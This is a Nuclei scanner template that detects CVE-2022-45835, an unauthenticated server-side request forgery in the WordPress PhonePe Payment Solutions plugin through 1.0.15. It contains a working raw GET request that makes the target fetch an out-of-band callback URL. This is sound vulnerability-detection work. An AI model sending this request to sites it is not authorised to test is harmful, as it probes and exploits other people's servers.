47 lines
1.7 KiB
YAML
47 lines
1.7 KiB
YAML
id: CVE-2022-45835
|
|
|
|
info:
|
|
name: WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery
|
|
author: theamanrawat
|
|
severity: medium
|
|
description: |
|
|
WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
|
remediation: Fixed in version 2.0.0.
|
|
reference:
|
|
- https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf
|
|
- https://wordpress.org/plugins/phonepe-payment-solutions/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-45835
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2022-45835
|
|
cwe-id: CWE-918
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "cURL Test for PhonePe"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a004630440220528db71bb993ff57395b94ea901851300a9f5083e434e1f1150c35a06de8acfc02200c4e841e3d16adfc80d569a3ff0ca926c4d63ae6690331393f25bd33bfbe693e:922c64590222798bb761d5b6d8e72950
|